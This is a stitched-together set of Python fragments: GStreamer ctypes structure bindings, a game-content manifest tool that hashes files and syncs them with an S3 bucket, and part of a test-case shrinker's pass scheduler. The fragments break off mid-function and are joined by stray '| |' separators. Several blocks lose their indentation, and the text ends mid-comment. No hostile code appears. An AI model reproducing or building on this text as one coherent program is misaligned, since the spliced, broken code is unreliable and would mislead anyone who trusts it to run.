        ('is_seekable', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc))),
        ('unlock', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc))),
        ('event', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc), ctypes.POINTER(GstEvent))),
        ('create', ctypes.CFUNCTYPE(GstFlowReturn,
            ctypes.POINTER(GstBaseSrc), ctypes.c_uint64, ctypes.c_uint,
            ctypes.POINTER(ctypes.POINTER(GstBuffer)))),
        ('do_seek', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc), ctypes.POINTER(GstSegment))),
        ('query', ctypes.c_void_p),
        ('check_get_range', ctypes.c_void_p),
        ('fixate', ctypes.c_void_p),
        ('_gst_reserved', (ctypes.c_void_p * (GST_PADDING_LARGE - 4))),
    ]
# ctypes mirror of GstBaseSink (base class for sink elements).
class GstBaseSink(ctypes.Structure):
    _fields_ = [
        ('element', GstElement),
        ('sinkpad', ctypes.c_void_p),
        ('pad_mode', ctypes.c_int),
        ('offset', ctypes.c_uint64),
        ('can_activate_pull', ctypes.c_int),
        ('can_activate_push', ctypes.c_int),
        ('preroll_queue', ctypes.c_void_p),
        ('preroll_queue_max_len', ctypes.c_int),
        ('preroll_queued', ctypes.c_int),
        ('buffers_queued', ctypes.c_int),
        ('events_queued', ctypes.c_int),
        ('eos', ctypes.c_int),
        ('eos_queued', ctypes.c_int),
        ('need_preroll', ctypes.c_int),
        ('have_preroll', ctypes.c_int),
        ('playing_async', ctypes.c_int),
        ('have_newsegment', ctypes.c_int),
        ('segment', GstSegment),
        ('clock_id', ctypes.c_void_p),
        ('end_time', ctypes.c_uint64),
        ('sync', ctypes.c_int),
        ('flushing', ctypes.c_int),
        ('_gst_reserved', ctypes.c_void_p * (GST_PADDING_LARGE - 1)),
        ('priv', ctypes.c_void_p),
    ]

# ctypes mirror of GstBaseSinkClass; vtable slots kept opaque.
class GstBaseSinkClass(ctypes.Structure):
    _fields_ = [
        ('parent_class', GstElementClass),
        ('get_caps', ctypes.c_void_p),
        ('set_caps', ctypes.c_void_p),
        ('buffer_alloc', ctypes.c_void_p),
        ('get_times', ctypes.c_void_p),
        ('start', ctypes.c_void_p),
        ('stop', ctypes.c_void_p),
        ('unlock', ctypes.c_void_p),
        ('event', ctypes.c_void_p),
        ('preroll', ctypes.c_void_p),
        ('render', ctypes.c_void_p),
        ('async_play', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p * (GST_PADDING_LARGE - 1)),
    ]

# ctypes mirror of GstBaseAudioSink.
class GstBaseAudioSink(ctypes.Structure):
    _fields_ = [
        ('element', GstBaseSink),
        ('ringbuffer', ctypes.c_void_p),
        ('buffer_time', ctypes.c_uint64),
        ('latency_time', ctypes.c_uint64),
        ('next_sample', ctypes.c_uint64),
        ('provide_clock', ctypes.c_int),
        ('provided_clock', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

# ctypes mirror of GstBaseAudioSinkClass.
class GstBaseAudioSinkClass(ctypes.Structure):
    _fields_ = [
        ('parent_class', GstBaseSinkClass),
        ('create_ringbuffer', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

# ctypes mirror of GstAudioSink.
class GstAudioSink(ctypes.Structure):
    _fields_ = [
        ('element', GstBaseAudioSink),
        ('thread', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]
# GstBufferFormatType enumeration (audio sample encoding families).
GstBufferFormatType = ctypes.c_int
GST_BUFFER_LINEAR = 0
GST_BUFFER_FLOAT = 1
GST_BUFFER_MU_LAW = 2
GST_BUFFER_A_LAW = 3
GST_BUFFER_IMA_ADPCM = 4
GST_BUFFER_MPEG = 5
GST_BUFFER_GSM = 6
GstBufferFormat = ctypes.c_int

# ctypes mirror of GstRingBufferSpec (negotiated audio format description).
class GstRingBufferSpec(ctypes.Structure):
    _fields_ = [
        ('caps', ctypes.POINTER(GstCaps)),
        ('type', GstBufferFormatType),
        ('format', GstBufferFormat),
        ('sign', ctypes.c_int),
        ('bigend', ctypes.c_int),
        ('width', ctypes.c_int),
        ('depth', ctypes.c_int),
        ('rate', ctypes.c_int),
        ('channels', ctypes.c_int),
        ('latency_time', ctypes.c_uint64),
        ('buffer_time', ctypes.c_uint64),
        ('segsize', ctypes.c_int),
        ('segtotal', ctypes.c_int),
        ('bytes_per_sample', ctypes.c_int),
        ('silence_sample', ctypes.c_uint8 * 32),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

# ctypes mirror of GstAudioSinkClass; the device I/O slots are typed
# CFUNCTYPEs so Python implementations can be installed.
class GstAudioSinkClass(ctypes.Structure):
    _fields_ = [
        ('parent_class', GstBaseAudioSinkClass),
        ('open', ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p)),
        ('prepare', ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p,
            ctypes.POINTER(GstRingBufferSpec))),
        ('unprepare', ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p)),
        ('close', ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p)),
        ('write', ctypes.CFUNCTYPE(ctypes.c_uint, ctypes.c_void_p,
            ctypes.POINTER(ctypes.c_byte), ctypes.c_uint)),
        ('delay', ctypes.CFUNCTYPE(ctypes.c_uint, ctypes.c_void_p)),
        ('reset', ctypes.CFUNCTYPE(None, ctypes.c_void_p)),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]
def py_derived_element(base):
    """Derive a ctypes structure from *base* with an extra 'pyobject' member.

    The returned class embeds *base* as its first member and appends a
    py_object slot so Python state can travel with the C structure.
    """
    fields = [
        ('element', base),
        ('pyobject', ctypes.py_object),
    ]
    return type('PyGstElement', (ctypes.Structure,), {'_fields_': fields})
# GstMessageType flag values (bus message kinds; combinable as a bitmask).
GstMessageType = ctypes.c_int
GST_MESSAGE_UNKNOWN = 0
GST_MESSAGE_EOS = (1 << 0)
GST_MESSAGE_ERROR = (1 << 1)
GST_MESSAGE_WARNING = (1 << 2)
GST_MESSAGE_INFO = (1 << 3)
GST_MESSAGE_TAG = (1 << 4)
GST_MESSAGE_BUFFERING = (1 << 5)
GST_MESSAGE_STATE_CHANGED = (1 << 6)
GST_MESSAGE_STATE_DIRTY = (1 << 7)
GST_MESSAGE_STEP_DONE = (1 << 8)
GST_MESSAGE_CLOCK_PROVIDE = (1 << 9)
GST_MESSAGE_CLOCK_LOST = (1 << 10)
GST_MESSAGE_NEW_CLOCK = (1 << 11)
GST_MESSAGE_STRUCTURE_CHANGE = (1 << 12)
GST_MESSAGE_STREAM_STATUS = (1 << 13)
GST_MESSAGE_APPLICATION = (1 << 14)
GST_MESSAGE_ELEMENT = (1 << 15)
GST_MESSAGE_SEGMENT_START = (1 << 16)
GST_MESSAGE_SEGMENT_DONE = (1 << 17)
GST_MESSAGE_DURATION = (1 << 18)
GST_MESSAGE_LATENCY = (1 << 19)
GST_MESSAGE_ANY = ~0

# ctypes mirror of GstMessage (a bus message).
class GstMessage(ctypes.Structure):
    _fields_ = [
        ('mini_object', GstMiniObject),
        ('lock', ctypes.c_void_p),
        ('cond', ctypes.c_void_p),
        ('type', GstMessageType),
        ('timestamp', ctypes.c_uint64),
        ('src', ctypes.c_void_p),
        ('structure', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

# Tell ctypes that gst_bus_poll returns a GstMessage pointer rather than int.
gst.gst_bus_poll.restype = ctypes.POINTER(GstMessage)
# Python high-level classes
class Plugin(object):
name = ''
description = ''
version = ''
license | |
replace_path = ensure_posix_path(pak_path)
try:
return replace_path.split(context.config.game_directory_name + '/')[1]
except:
return replace_path
def _add_pak_to_manifest(context, pak_path, manifest_path, manifest, platform_name):
    """Add a pak file to the manifest's Paks section unless it is already listed."""
    pak_entry_path = _get_relative_path_after_game_dir(context, pak_path)
    already_listed = any(
        entry.get('pakFile') == pak_entry_path
        for entry in _get_paks_list(context, manifest))
    if not already_listed:
        add_file_entry(context, manifest_path, pak_entry_path, 'Paks',
                       pak_entry_path, './', platform_type=platform_name)
def _remove_file_entry_from_section(context, file_name, platform, manifest_path, manifest, section):
    """
    Remove matching file entries from one manifest section.

    An entry matches when its keyName/localFolder equal the basename/dirname
    of file_name and its platformType equals platform. Saves the manifest
    when anything was removed.

    Returns:
        True if at least one entry was removed.
    """
    if section is None:
        raise HandledError('No section specified to remove file entry from')
    if file_name is None:
        raise HandledError('No file name specified')
    files_list = _get_files_list(context, manifest, section)
    local_path, key_name = os.path.split(file_name)
    # Bug fix: the original called files_list.remove() while iterating the
    # same list, which can skip the entry immediately after a removed one.
    # Build a filtered list instead.
    kept_entries = [entry for entry in files_list
                    if not (entry['keyName'] == key_name
                            and entry['localFolder'] == local_path
                            and entry['platformType'] == platform)]
    found_entry = len(kept_entries) != len(files_list)
    if found_entry:
        manifest[section] = kept_entries
        _save_content_manifest(context, manifest_path, manifest)
    return found_entry
def validate_writable(context, manifest_path):
    """Return True when the resolved manifest file is writable; report and return False otherwise."""
    manifest_path, _ = _get_path_and_manifest(context, manifest_path)
    if context.config.validate_writable(manifest_path):
        return True
    show_manifest.manifest_not_writable(manifest_path)
    return False
def remove_file_entry(context, args):
    """Remove args.file_name (for args.platform_type) from the Files or Paks section."""
    manifest_path, manifest = _get_path_and_manifest(context, args.manifest_path)
    if args.file_name is None:
        raise HandledError('No file name specified')
    if args.platform_type is None:
        raise HandledError('No platform type specified')
    # Try Files first, then fall back to Paks; error if neither had the key.
    for section in ('Files', 'Paks'):
        if _remove_file_entry_from_section(context, args.file_name, args.platform_type,
                                           manifest_path, manifest, section):
            return
    raise HandledError('Key not found {} with platform type {}'.format(
        args.file_name, args.platform_type))
def _get_files_list(context, manifest, section=None):
if manifest is None:
raise HandledError('No manifest data loaded')
if section is not None:
files_list = manifest.get(section)
if files_list is None:
if section not in ['Files', 'Paks']:
raise HandledError('No section {} found in manifest'.format(section))
files_list = []
else:
files_list = []
files_list.extend(manifest.get('Files', []))
files_list.extend(manifest.get('Paks', []))
return files_list
def _get_platforms_list(context, manifest):
if manifest is None:
raise HandledError('No manifest data loaded')
return manifest.get('Metadata', {}).get('Platforms', [])
def _get_paks_list(context, manifest):
if manifest is None:
raise HandledError('No manifest data loaded')
paks_list = manifest.get('Paks', [])
if paks_list is None:
raise HandledError('No Paks list found in manifest')
return paks_list
def _get_default_manifest_path(context):
    """Return the full path of the default manifest inside the game's manifest folder."""
    return os.path.join(
        dynamic_content_settings.get_manifest_game_folder(context.config.game_directory_path),
        dynamic_content_settings.get_default_manifest_name())
def determine_manifest_path(context, provided_name):
    """Resolve a manifest path, falling back to the default manifest when no name is given."""
    if provided_name is None:
        return _get_default_manifest_path(context)
    manifest_folder = dynamic_content_settings.get_manifest_game_folder(
        context.config.game_directory_path)
    return os.path.join(manifest_folder, provided_name)
def _get_path_and_manifest(context, provided_name):
    """Resolve the manifest path and load its JSON content as a (path, manifest) pair."""
    path = determine_manifest_path(context, provided_name)
    return path, context.config.load_json(path)
def command_update_file_hashes(context, args):
    """CLI entry point: refresh the stored file hashes in the named manifest."""
    path, manifest = _get_path_and_manifest(context, args.manifest_path)
    _update_file_hashes(context, path, manifest)
def _update_file_hash_section(context, manifest_path, manifest, section):
    """
    Recompute the MD5 hash (and size) of every file entry in one manifest section.

    Entries whose file is missing on disk get an empty hash and a size of
    None. The section list in the manifest is updated in place.

    Returns:
        True if any entry's hash changed, i.e. the manifest needs saving.
    """
    if section is None:
        # Fixed message: it previously read 'No specified to update hashes for'.
        raise HandledError('No section specified to update hashes for')
    files_list = _get_files_list(context, manifest, section)
    show_manifest.updating_file_hashes(manifest_path)
    files_updated = False
    for this_file in files_list:
        this_file_path = _get_path_for_file_entry(context, this_file,
                                                  context.config.game_directory_name)
        if not os.path.isfile(this_file_path):
            show_manifest.invalid_file(this_file_path)
            this_file['hash'] = ''
            this_file['size'] = None
            continue
        # Use a context manager so the file handle is closed promptly
        # (the original leaked the handle from open(...).read()).
        with open(this_file_path, 'rb') as content_file:
            hex_return = hashlib.md5(content_file.read()).hexdigest()
        manifest_hash = this_file.get('hash', '')
        if hex_return != manifest_hash:
            files_updated = True
            show_manifest.hash_comparison_disk(this_file_path, manifest_hash, hex_return)
            this_file['hash'] = hex_return
            this_file['size'] = os.stat(this_file_path).st_size
    manifest[section] = files_list
    return files_updated
def _update_file_hashes(context, manifest_path, manifest):
    """Refresh hashes for both Files and Paks, saving the manifest when anything changed."""
    changed = _update_file_hash_section(context, manifest_path, manifest, 'Files')
    # The Paks pass must run even when Files already changed, so it comes first
    # in the boolean expression.
    changed = _update_file_hash_section(context, manifest_path, manifest, 'Paks') or changed
    if changed:
        _save_content_manifest(context, manifest_path, manifest)
def _save_content_manifest(context, filePath, manifestData):
    """Write the manifest JSON back to disk after a writability check."""
    context.config.validate_writable(filePath)
    context.config.save_json(filePath, manifestData)
    print("Updated manifest")
def _get_content_bucket(context):
    """Return the content bucket id for the default deployment / resource group / bucket."""
    return _get_content_bucket_by_name(
        context,
        context.config.default_deployment,
        dynamic_content_settings.get_default_resource_group(),
        dynamic_content_settings.get_default_bucket_name())
def _get_content_bucket_by_name(context, deployment_name,
                                resource_group_name=dynamic_content_settings.get_default_resource_group(),
                                bucket_name=dynamic_content_settings.get_default_bucket_name()):
    """Returns the resource id of the content bucket."""
    if deployment_name is None:
        deployment_name = context.config.default_deployment
    stack_id = context.config.get_resource_group_stack_id(
        deployment_name, resource_group_name, optional=True)
    return context.stack.get_physical_resource_id(stack_id, bucket_name)
def _get_bucket_content_list(context):
    """
    List every object in the content bucket, paging through list_objects.

    Returns:
        Combined list of the 'Contents' entries from each page.

    Raises:
        HandledError: when the list_objects call fails.
    """
    s3 = context.aws.client('s3')
    bucket_name = _get_content_bucket(context)
    next_marker = 0
    contents_list = []
    while True:
        try:
            res = s3.list_objects(
                Bucket=bucket_name,
                Marker=str(next_marker)
            )
            this_list = res.get('Contents', [])
            contents_list += this_list
            if len(this_list) < get_list_objects_limit():
                break
            # NOTE(review): S3's Marker is "start after this key", not a
            # numeric offset; this numeric paging looks suspect — confirm
            # against the bucket's key naming before changing it.
            next_marker += get_list_objects_limit()
        except Exception as e:
            # Fixed: the format string previously had no {bucket} placeholder,
            # so the bucket name never appeared in the error message.
            raise HandledError('Could not list_objects on {bucket}'.format(bucket=bucket_name), e)
    return contents_list
def _send_bucket_delete_list(context, objectList):
    """
    Issue one delete_objects call for the given list of {'Key': ...} entries.

    Raises:
        HandledError: when the delete_objects call fails.
    """
    s3 = context.aws.client('s3')
    bucket_name = _get_content_bucket(context)
    try:
        s3.delete_objects(
            Bucket=bucket_name,
            Delete={'Objects': objectList}
        )
    except Exception as e:
        # Fixed: the format string previously had no {bucket} placeholder,
        # so the bucket name never appeared in the error message.
        raise HandledError('Could not delete_objects on {bucket}'.format(bucket=bucket_name), e)
def command_empty_content(context, args):
    """CLI entry point: delete all bucket content, then clear the staging table."""
    _empty_bucket_contents(context)
    staging.empty_staging_table(context)
def _empty_bucket_contents(context):
    """Delete every object in the content bucket, batching deletes at the API limit."""
    batch = []
    for item in _get_bucket_content_list(context):
        batch.append({'Key': item.get('Key', {})})
        if len(batch) == get_list_objects_limit():
            _send_bucket_delete_list(context, batch)
            batch = []
    if batch:
        _send_bucket_delete_list(context, batch)
def make_end_in_slash(file_name):
    """Return file_name guaranteed to end with a POSIX path separator."""
    return posixpath.join(file_name, '')
def _create_bucket_key(fileEntry):
file_key = fileEntry.get('bucketPrefix', '')
if len(file_key):
file_key += '/'
file_key += fileEntry.get('keyName', '')
return file_key
def get_standalone_manifest_pak_key(context, manifest_path):
    """Return the file name (basename) of the standalone manifest pak."""
    pak_path = _get_path_for_standalone_manifest_pak(context, manifest_path)
    return os.path.split(pak_path)[1]
def get_standalone_manifest_key(context, manifest_path):
    """Return the manifest's file name without its directory part."""
    return os.path.basename(manifest_path)
def add_manifest_pak_entry(context, manifest, manifest_path, filesList):
    """
    Append an entry describing the manifest's own pak to filesList.

    When uploading all of the changed content within a top level manifest we
    also need to pak up the manifest itself and upload it; this appends an
    entry about that manifest pak to the list of "changed content" so it all
    goes up in one pass.
    """
    # Use a context manager so the file handle is closed promptly
    # (the original leaked the handle from open(...).read()).
    with open(manifest_path, 'rb') as manifest_file:
        manifest_hash = hashlib.md5(manifest_file.read()).hexdigest()
    filesList.append({
        'keyName': get_standalone_manifest_pak_key(context, manifest_path),
        'localFolder': dynamic_content_settings.get_pak_folder(),
        'hash': manifest_hash,
        'size': os.stat(manifest_path).st_size,
    })
def _create_manifest_bucket_key_map(context, manifest, manifest_path):
    """Map each uploadable pak's bucket key (including the manifest itself) to its hash."""
    files_list = _get_files_list(context, manifest, 'Paks')
    add_manifest_pak_entry(context, manifest, manifest_path, files_list)
    _append_loose_manifest(context, files_list, manifest_path)
    return {_create_bucket_key(entry): entry.get('hash', '')
            for entry in files_list}
def list_bucket_content(context, args):
    """Compare bucket objects against the manifest, then report keys only present locally."""
    manifest_path, manifest = _get_path_and_manifest(context, args.manifest_path)
    contents_list = _get_bucket_content_list(context)
    manifest_dict = _create_manifest_bucket_key_map(context, manifest, manifest_path)
    s3 = context.aws.client('s3')
    bucket_name = _get_content_bucket(context)
    for bucket_item in contents_list:
        this_key = bucket_item.get('Key')
        if this_key not in manifest_dict:
            continue
        try:
            head_response = s3.head_object(Bucket=bucket_name, Key=this_key)
        except Exception:
            show_manifest.key_not_found(this_key)
            continue
        show_manifest.hash_comparison_bucket(this_key, manifest_dict[this_key],
                                             _get_bucket_item_hash(head_response))
        # Anything still in manifest_dict afterwards exists only locally.
        del manifest_dict[this_key]
    for remaining_key in manifest_dict.keys():
        show_manifest.new_local_key(remaining_key)
def compare_bucket_content(context, args):
    """Report a hash comparison between each manifest key and its bucket object."""
    manifest_path, manifest = _get_path_and_manifest(context, args.manifest_path)
    s3 = context.aws.client('s3')
    bucket_name = _get_content_bucket(context)
    key_to_hash = _create_manifest_bucket_key_map(context, manifest, manifest_path)
    for this_key, this_hash in iteritems(key_to_hash):
        try:
            head_response = s3.head_object(Bucket=bucket_name, Key=this_key)
        except Exception:
            show_manifest.key_not_found(this_key)
            continue
        show_manifest.hash_comparison_bucket(this_key, this_hash,
                                             _get_bucket_item_hash(head_response))
def check_matched_bucket_entry(context, localFile, localHash, bucketKey):
    """Return True when the bucket object's stored hash matches localHash."""
    s3 = context.aws.client('s3')
    bucket_name = _get_content_bucket(context)
    try:
        head_response = s3.head_object(Bucket=bucket_name, Key=bucketKey)
    except Exception:
        print("Didn't find entry {}".format(bucketKey))
        return False
    bucket_hash = _get_bucket_item_hash(head_response)
    print("Comparing {} vs Bucket {}".format(localHash, bucket_hash))
    return bucket_hash == localHash
def _get_bucket_item_hash(bucketItem):
    """
    Return the locally-computed hash stored in the object's S3 metadata.

    Returns an empty string when the metadata key is absent. (The previous
    default of {} returned a dict where every caller expects a hash string
    to compare and display.)
    """
    return bucketItem.get('Metadata', {}).get(_get_meta_hash_name(), '')
# Retrieve the list of files in the bucket which do not line up with our current manifest
def _get_unmatched_content(context, manifest, manifest_path, deployment_name, do_signing):
    """
    Return {bucket_key: hash} for manifest entries that need uploading.

    An entry is unmatched when its object is missing from the bucket, its
    bucket-side hash differs from the local hash, or its signing status
    changed.
    """
    s3 = context.aws.client('s3')
    bucket_name = _get_content_bucket_by_name(context, deployment_name)
    manifest_dict = _create_manifest_bucket_key_map(context, manifest, manifest_path)
    return_dict = {}
    for this_key, this_hash in iteritems(manifest_dict):
        try:
            head_response = s3.head_object(
                Bucket=bucket_name,
                Key=this_key
            )
        except Exception:
            show_manifest.key_not_found(this_key)
            return_dict[this_key] = this_hash
            continue
        # Compute the bucket-side hash once instead of twice per entry.
        bucket_hash = _get_bucket_item_hash(head_response)
        show_manifest.hash_comparison_bucket(this_key, this_hash, bucket_hash)
        if bucket_hash != this_hash or staging.signing_status_changed(context, this_key, do_signing):
            return_dict[this_key] = this_hash
    return return_dict
class ProgressPercentage(object):
    """Upload progress callback that reports percent complete to the context view.

    Reports are throttled to roughly 2% increments to avoid flooding the view.
    """

    def __init__(self, context, filename):
        self._filename = filename
        self._context = context
        self._size = float(os.path.getsize(filename))
        self._seen_so_far = 0
        # The lock protects the running totals; callbacks may arrive
        # concurrently from the uploader's worker threads.
        self._lock = threading.Lock()
        self._last_print_percent = -1

    def __call__(self, bytes_amount):
        with self._lock:
            self._seen_so_far += bytes_amount
            percent_done = (self._seen_so_far / self._size) * 100
            # Only report when the ~2%-bucket changes.
            if round(percent_done / 2) != round(self._last_print_percent / 2):
                self._last_print_percent = percent_done
                self._context.view.update_percent_complete(self._last_print_percent)
def command_upload_manifest_content(context, args):
    # CLI entry point: translate parsed argparse options into an
    # upload_manifest_content call (staging flags are parsed separately).
    staging_args = staging.parse_staging_arguments(args)
    upload_manifest_content(context, args.manifest_path, args.deployment_name, staging_args, args.all, args.signing, args.invalidate_existing_files)
def _append_loose_manifest(context, files_list, manifest_path):
    """Append an entry describing the loose (non-pak) manifest file itself to
    files_list so it is uploaded alongside the content it describes.

    The entry records the manifest's key name, its local folder (preserving
    any sub-folder under the default manifest folder), its MD5 hash, and its
    size in bytes.
    """
    # Need to preserve sub-folder data
    manifest_path = ensure_posix_path(manifest_path)
    manifest_folder = dynamic_content_settings.get_manifest_folder()
    # Strip out any path information before the default manifest folder
    # to get relative sub-path under folder
    manifest_sub_path = manifest_path.partition(manifest_folder)[2]
    manifest_local_folder = dynamic_content_settings.get_manifest_folder()
    if len(manifest_sub_path):
        manifest_local_folder = manifest_local_folder + os.path.dirname(manifest_sub_path)
    # Read the manifest through a context manager so the handle is closed
    # deterministically (the original left the file object open until GC).
    with open(manifest_path, 'rb') as manifest_file:
        manifest_hash = hashlib.md5(manifest_file.read()).hexdigest()
    manifest_object = {
        'keyName': os.path.split(manifest_path)[1],
        'localFolder': manifest_local_folder,
        'hash': manifest_hash
    }
    file_stat = os.stat(manifest_path)
    manifest_object['size'] = file_stat.st_size
    files_list.append(manifest_object)
# 1 - Build new paks to ensure our paks are up to date and our manifest reflects the latest changes
# 2 - Update our manifest hashes to match our current content
# 3 - Check each item in our manifest against a HEAD call to get the metadata with our saved local hash values
# 4 - Upload each unmatched pak file
# 5 - Upload the manifest (In pak and loose)
def upload_manifest_content(context, manifest_path, deployment_name, staging_args, upload_all=False, do_signing=False, invalidate_existing_files=False):
    """Upload every out-of-date file referenced by the manifest to the
    deployment's content bucket, then (optionally) set staging status.

    :param upload_all: when True, upload every file regardless of whether
        its bucket copy already matches.
    :param do_signing: when True, compute and record a file signature for
        each uploaded item.
    :param invalidate_existing_files: forwarded to _do_file_upload.
    """
    build_new_paks(context, manifest_path, upload_all)
    manifest_path, manifest = _get_path_and_manifest(context, manifest_path)
    _update_file_hashes(context, manifest_path, manifest)
    # Keys whose bucket copy is missing/stale; anything else is skipped below
    # unless upload_all is set.
    remaining_content = _get_unmatched_content(context, manifest, manifest_path, deployment_name, do_signing)
    bucket_name = _get_content_bucket_by_name(context, deployment_name)
    files_list = _get_files_list(context, manifest, 'Paks')
    # The loose manifest itself is uploaded alongside the paks.
    _append_loose_manifest(context, files_list, manifest_path)
    uploaded_files = {}
    for thisFile in files_list:
        this_key = _create_bucket_key(thisFile)
        if this_key in remaining_content or upload_all:
            this_file_path = _get_path_for_file_entry(context, thisFile, context.config.game_directory_name)
            # An empty hash marks an entry we could not hash locally; don't upload it.
            if thisFile['hash'] == '':
                show_manifest.skipping_invalid_file(this_file_path)
                continue
            show_manifest.found_updated_item(this_key)
            context.view.found_updated_item(this_key)
            _do_file_upload(context, this_file_path, bucket_name, this_key, thisFile['hash'], invalidate_existing_files)
            upload_info = {}
            if do_signing:
                this_signature = signing.get_file_signature(context, _get_path_for_file_entry(context, thisFile, context.config.game_directory_name))
                upload_info['Signature'] = this_signature
            upload_info['Size'] = thisFile.get('size')
            upload_info['Hash'] = thisFile.get('hash')
            uploaded_files[this_key] = upload_info
    parent_pak_key = get_standalone_manifest_pak_key(context, manifest_path)
    parent_loose_key = get_standalone_manifest_key(context, manifest_path)
    if staging_args is not None:
        # Record staging status for each uploaded key; the manifest itself
        # (pak or loose form) has no parent, everything else points at the
        # manifest pak.
        for thisFile, fileInfo in iteritems(uploaded_files):
            staging_args['Signature'] = fileInfo.get('Signature')
            staging_args['Size'] = fileInfo.get('Size')
            staging_args['Hash'] = fileInfo.get('Hash')
            if thisFile in [parent_pak_key, parent_loose_key]:
                staging_args['Parent'] = ''
            else:
                staging_args['Parent'] = parent_pak_key
            staging.set_staging_status(thisFile, context, staging_args, deployment_name)
def _get_meta_hash_name():
return 'hash'
def _do_file_upload(context, | |
'command'):
self.known_programs.add(run.command)
self.passes.append(p)
self.passes_awaiting_requeue.append(p)
self.passes_by_name[p.name] = p
return p
def shrink_pass(self, name):
    """Look up the shrink pass called ``name``, registering it lazily as a
    SPECIAL pass if it exists on Shrinker but has not been added yet."""
    if name not in self.passes_by_name and hasattr(Shrinker, name):
        self.add_new_pass(name, classification=PassClassification.SPECIAL)
    return self.passes_by_name[name]
def requeue_passes(self):
    """Drain passes_awaiting_requeue, pushing each pass back onto the heap
    for its current classification."""
    queues = self.pass_queues
    while self.passes_awaiting_requeue:
        pending = self.passes_awaiting_requeue.pop()
        heapq.heappush(queues[pending.classification], pending)
def has_queued_passes(self, classification):
    """True if any shrink passes are currently enqueued under this
    classification (passes awaiting requeue do not count)."""
    return bool(self.pass_queues[classification])
def pop_queued_pass(self, classification):
    """Take the best queued pass for this classification, run it, and mark
    it for requeueing afterwards."""
    chosen = heapq.heappop(self.pass_queues[classification])
    self.passes_awaiting_requeue.append(chosen)
    self.run_shrink_pass(chosen)
def run_queued_until_change(self, classification):
    """Run passes with this classification until the queue empties or one
    of them shrinks the target; report whether a shrink happened."""
    before = self.shrink_target
    while self.shrink_target is before and self.has_queued_passes(classification):
        self.pop_queued_pass(classification)
    return self.shrink_target is not before
def run_one_queued_pass(self, classification):
    """Run a single queued pass with this classification, if any exist."""
    if not self.has_queued_passes(classification):
        return
    self.pop_queued_pass(classification)
def run_queued_passes(self, classification):
    """Exhaust the queue for this classification, running every pass."""
    while True:
        if not self.has_queued_passes(classification):
            break
        self.pop_queued_pass(classification)
@property
def calls(self):
    """Total number of test-function calls recorded by the owning engine."""
    return self.__engine.call_count
def consider_new_buffer(self, buffer):
    """Accept ``buffer`` if it extends the current buffer, otherwise try to
    incorporate it as a strictly better shrink target."""
    candidate = hbytes(buffer)
    if candidate.startswith(self.buffer):
        return True
    return self.incorporate_new_buffer(candidate)
def incorporate_new_buffer(self, buffer):
    """Attempt to adopt ``buffer`` as the new shrink target.

    Returns True if the buffer was run and accepted as a strictly
    smaller (by sort_key) interesting example, False otherwise.
    """
    # Truncate to the number of bytes the current target actually consumed.
    buffer = hbytes(buffer[:self.shrink_target.index])
    # Serve from the local result cache when we have already run this buffer.
    try:
        existing = self.__test_function_cache[buffer]
    except KeyError:
        pass
    else:
        return self.incorporate_test_data(existing)
    # Sometimes an attempt at lexicographic minimization will do the wrong
    # thing because the buffer has changed under it (e.g. something has
    # turned into a write, the bit size has changed). The result would be
    # an invalid string, but it's better for us to just ignore it here as
    # it turns out to involve quite a lot of tricky book-keeping to get
    # this right and it's better to just handle it in one place.
    if sort_key(buffer) >= sort_key(self.shrink_target.buffer):
        return False
    if self.shrink_target.buffer.startswith(buffer):
        return False
    # Let the engine veto buffers it already knows are not worth running.
    if not self.__engine.prescreen_buffer(buffer):
        return False
    assert sort_key(buffer) <= sort_key(self.shrink_target.buffer)
    data = ConjectureData.for_buffer(buffer)
    self.__engine.test_function(data)
    self.__test_function_cache[buffer] = data
    return self.incorporate_test_data(data)
def incorporate_test_data(self, data):
    """Adopt ``data`` as the shrink target when it satisfies the predicate
    and its buffer sorts strictly below the current target's buffer."""
    self.__test_function_cache[data.buffer] = data
    if not self.__predicate(data):
        return False
    if sort_key(data.buffer) >= sort_key(self.shrink_target.buffer):
        return False
    self.update_shrink_target(data)
    self.__shrinking_block_cache = {}
    return True
def cached_test_function(self, buffer):
    """Run the test function for ``buffer`` through the engine's cache,
    recording and incorporating the result locally as well."""
    buffer = hbytes(buffer)
    cache = self.__test_function_cache
    if buffer in cache:
        return cache[buffer]
    result = self.__engine.cached_test_function(buffer)
    self.incorporate_test_data(result)
    cache[buffer] = result
    return result
def debug(self, msg):
    # Forward debug output to the owning engine's debug channel.
    self.__engine.debug(msg)
@property
def random(self):
    """The owning engine's shared source of randomness."""
    return self.__engine.random
def run_shrink_pass(self, sp):
    """Runs the function associated with ShrinkPass sp and updates the
    relevant metadata.

    Note that sp may or may not be a pass currently associated with
    this shrinker. This does not handle any requeueing that is
    required.
    """
    # Callers may pass a pass by name; resolve it first.
    if isinstance(sp, str):
        sp = self.shrink_pass(sp)
    self.debug('Shrink Pass %s' % (sp.name,))
    initial_shrinks = self.shrinks
    initial_calls = self.calls
    size = len(self.shrink_target.buffer)
    # Stats are updated in the finally block so they are recorded even if
    # the pass function raises.
    try:
        sp.pass_function(self)
    finally:
        calls = self.calls - initial_calls
        shrinks = self.shrinks - initial_shrinks
        deletions = size - len(self.shrink_target.buffer)
        sp.calls += calls
        sp.shrinks += shrinks
        sp.deletions += deletions
        sp.runs += 1
        self.debug('Shrink Pass %s completed.' % (sp.name,))
    # Complex state machine alert! A pass run can either succeed (we made
    # at least one shrink) or fail (we didn't). This changes the pass's
    # current classification according to the following possible
    # transitions:
    #
    # CANDIDATE -------> HOPEFUL
    #     |                |  ^
    #     |                |  |
